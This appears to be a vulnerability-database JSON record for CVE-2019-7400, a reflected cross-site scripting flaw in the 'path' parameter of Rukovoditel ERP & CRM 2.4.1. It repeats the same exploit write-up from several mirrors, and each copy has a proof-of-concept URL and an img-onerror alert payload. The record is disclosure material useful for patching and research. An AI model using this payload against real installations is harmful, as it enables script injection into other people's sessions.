{"id": "EDB-ID:46608", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Rukovoditel ERP &amp; CRM 2.4.1 - &#039;path&#039; Cross-Site Scripting", "description": "", "published": "2019-03-26T00:00:00", "modified": "2019-03-26T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/46608", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2019-7400"], "lastseen": "2019-03-26T17:36:28", "viewCount": 8, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-7400"]}, {"type": "zdt", "idList": ["1337DAY-ID-32428"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:E920C4222BD36FD80A591263B5255D10"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152248"]}], "modified": "2019-03-26T17:36:28", "rev": 2}, "score": {"value": 4.1, "vector": "NONE", "modified": "2019-03-26T17:36:28", "rev": 2}, "vulnersScore": 4.1}, "sourceHref": "https://www.exploit-db.com/download/46608", "sourceData": "# Exploit Title: Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting\r\n# Exploit Author: Javier Olmedo\r\n# Website: https://hackpuntes.com\r\n# Date: 2019-03-24\r\n# Google Dork: N/A\r\n# Vendor: Rukovoditel\r\n# Software Link: https://sourceforge.net/projects/rukovoditel/\r\n# Affected Version: 2.4.1 and possibly before\r\n# Patched Version: patched in extension version 2.4.1\r\n# Category: Web Application\r\n# Platform: Windows\r\n# Tested on: Win10x64 & Kali Linux\r\n# CVE: 2019-7400\r\n# References:\r\n# https://hackpuntes.com/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/\r\n\r\n# 1. Technical Description:\r\n# path parameter is vulnerable to Reflected Cross-Site Scripting (XSS) attacks\r\n# through a GET request in index.php resource.\r\n \r\n# 2. Proof Of Concept (PoC):\r\n# http://localhost/index.php?module=items/items&path=%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22VULNERABLE%22)%3E\r\n\r\n# 3. Payload\r\n# \"><img src=a onerror=alert(\"VULNERABLE\")>", "osvdbidlist": []}

{"cve": [{"lastseen": "2020-12-09T21:41:56", "description": "Rukovoditel before 2.4.1 allows XSS.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-02-05T06:29:00", "title": "CVE-2019-7400", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-7400"], "modified": "2019-04-01T22:29:00", "cpe": [], "id": "CVE-2019-7400", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-7400", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "zdt": [{"lastseen": "2019-03-30T17:24:52", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2019-03-27T00:00:00", "title": "Rukovoditel ERP & CRM 2.4.1 - path Cross-Site Scripting Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-7400"], "modified": "2019-03-27T00:00:00", "id": "1337DAY-ID-32428", "href": "https://0day.today/exploit/description/32428", "sourceData": "# Exploit Title: Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting\r\n# Exploit Author: Javier Olmedo\r\n# Website: https://hackpuntes.com\r\n# Vendor: Rukovoditel\r\n# Software Link: https://sourceforge.net/projects/rukovoditel/\r\n# Affected Version: 2.4.1 and possibly before\r\n# Patched Version: patched in extension version 2.4.1\r\n# Category: Web Application\r\n# Platform: Windows\r\n# Tested on: Win10x64 & Kali Linux\r\n# CVE: 2019-7400\r\n# References:\r\n# https://hackpuntes.com/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/\r\n\r\n# 1. Technical Description:\r\n# path parameter is vulnerable to Reflected Cross-Site Scripting (XSS) attacks\r\n# through a GET request in index.php resource.\r\n \r\n# 2. Proof Of Concept (PoC):\r\n# http://localhost/index.php?module=items/items&path=%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22VULNERABLE%22)%3E\r\n\r\n# 3. Payload\r\n# \"><img src=a onerror=alert(\"VULNERABLE\")>\n\n# 0day.today [2019-03-30] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/32428"}], "packetstorm": [{"lastseen": "2019-03-28T22:53:29", "description": "", "published": "2019-03-27T00:00:00", "type": "packetstorm", "title": "Rukovoditel ERP And CRM 2.4.1 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-7400"], "modified": "2019-03-27T00:00:00", "id": "PACKETSTORM:152248", "href": "https://packetstormsecurity.com/files/152248/Rukovoditel-ERP-And-CRM-2.4.1-Cross-Site-Scripting.html", "sourceData": "`# Exploit Title: Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting \n# Exploit Author: Javier Olmedo \n# Website: https://hackpuntes.com \n# Date: 2019-03-24 \n# Google Dork: N/A \n# Vendor: Rukovoditel \n# Software Link: https://sourceforge.net/projects/rukovoditel/ \n# Affected Version: 2.4.1 and possibly before \n# Patched Version: patched in extension version 2.4.1 \n# Category: Web Application \n# Platform: Windows \n# Tested on: Win10x64 & Kali Linux \n# CVE: 2019-7400 \n# References: \n# https://hackpuntes.com/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/ \n \n# 1. Technical Description: \n# path parameter is vulnerable to Reflected Cross-Site Scripting (XSS) attacks \n# through a GET request in index.php resource. \n \n# 2. Proof Of Concept (PoC): \n# http://localhost/index.php?module=items/items&path=%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22VULNERABLE%22)%3E \n \n# 3. Payload \n# \"><img src=a onerror=alert(\"VULNERABLE\")> \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/152248/rukovoditelerpcrm241-xss.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:46", "description": "\nRukovoditel ERP CRM 2.4.1 - path Cross-Site Scripting", "edition": 1, "published": "2019-03-26T00:00:00", "title": "Rukovoditel ERP CRM 2.4.1 - path Cross-Site Scripting", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-7400"], "modified": "2019-03-26T00:00:00", "id": "EXPLOITPACK:E920C4222BD36FD80A591263B5255D10", "href": "", "sourceData": "# Exploit Title: Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting\n# Exploit Author: Javier Olmedo\n# Website: https://hackpuntes.com\n# Date: 2019-03-24\n# Google Dork: N/A\n# Vendor: Rukovoditel\n# Software Link: https://sourceforge.net/projects/rukovoditel/\n# Affected Version: 2.4.1 and possibly before\n# Patched Version: patched in extension version 2.4.1\n# Category: Web Application\n# Platform: Windows\n# Tested on: Win10x64 & Kali Linux\n# CVE: 2019-7400\n# References:\n# https://hackpuntes.com/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/\n\n# 1. Technical Description:\n# path parameter is vulnerable to Reflected Cross-Site Scripting (XSS) attacks\n# through a GET request in index.php resource.\n \n# 2. Proof Of Concept (PoC):\n# http://localhost/index.php?module=items/items&path=%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22VULNERABLE%22)%3E\n\n# 3. Payload\n# \"><img src=a onerror=alert(\"VULNERABLE\")>", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}